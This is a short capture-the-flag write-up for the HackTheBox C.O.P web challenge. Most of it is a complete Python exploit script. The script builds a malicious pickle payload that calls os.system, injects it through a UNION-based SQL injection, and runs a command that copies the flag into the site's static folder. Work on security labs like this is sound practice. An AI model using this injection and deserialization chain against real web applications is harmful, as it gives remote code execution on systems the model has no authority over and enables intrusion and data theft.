HackTheBox C.O.P Challenge
https://app.hackthebox.com/challenges/395
Description
The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!
Exploitation
#!/usr/bin/python3
import requests,pickle,base64,sys,os
def get_base_url():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
return f"http://{host}:{port}"
class RCE:
def __reduce__(self):
return (os.system, (payload_command,))
def create_malicious_pickle():
malicious_object = RCE()
pickled_payload = pickle.dumps(malicious_object)
encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
return encoded_payload
def inject_payload(encoded_payload):
injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
response = requests.get(injection_url)
if response.status_code == 200:
print("[+] Payload injected successfully.")
else:
print(f"[-] Injection failed with status code: {response.status_code}")
print("Server response:", response.text)
def check_flag_file():
response = requests.get(STATIC_FILE_URL)
if response.status_code == 200:
print("[+] Flag file accessed successfully!")
print(response.text, end='')
else:
print("[-] Could not access the flag file. The exploit may not have worked.")
BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'
if __name__ == "__main__":
encoded_payload = create_malicious_pickle()
print(f"[+] Generated payload: {encoded_payload}")
inject_payload(encoded_payload)
check_flag_file()
Summary
C.O.P: exploit the SQL injection, extract the needed data, and reach the flag.